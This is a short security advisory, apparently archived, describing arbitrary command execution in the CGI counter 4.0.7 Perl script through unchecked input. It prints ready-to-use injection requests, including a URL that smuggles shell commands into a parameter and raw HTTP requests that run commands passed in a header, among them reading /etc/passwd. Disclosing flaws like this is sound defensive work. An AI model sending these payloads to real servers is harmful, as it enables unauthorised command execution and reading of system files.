COMMAND

    counter.cgi

SYSTEMS AFFECTED

    CGI counter 4.0.7 by George Burgyan

PROBLEM

    Howard M.  Kash III  found following.   The popular  CGI web  page
    access counter  version 4.0.7  by George  Burgyan allows execution
    of arbitrary commands due to  unchecked user input.  Commands  are
    executed with the  same privilege as  the web server.   Of course,
    other exploits can be used to get root access on an unpatched OS.

    The  counter  consists  of  a  perl  script  called "counter", and
    multiple  links  to  counter  called  counter-ord,  counterfiglet,
    counterfiglet-ord,  counterbanner,  and  counterbanner-ord.    The
    following examples illustrate how they can be exploited:

        Using straight URL: http://web-server/cgi-bin/counterfiglet/nc/f=;echo;w;uname%20-a;id
        Passing commands in a variable:
         > telnet web-server www
         GET /cgi-bin/counterfiglet/nc/f=;sh%20-c%20"$HTTP_X" HTTP/1.0
         X: pwd;ls -la /etc;cat /etc/passwd

         > telnet web-server www
         GET /cgi-bin/counter/nl/ord/lang=english(1);system("$ENV{HTTP_X}"); HTTP/1.0
         X: echo;id;uname -a;w

SOLUTION

    The counter  was last  updated in  1995 so  is probably  no longer
    supported.   Links and  email addresses  referenced in  the source
    code are no longer valid.  However, it appears to still be  widely
    used based on the number  of references returned by search  engine
    queries.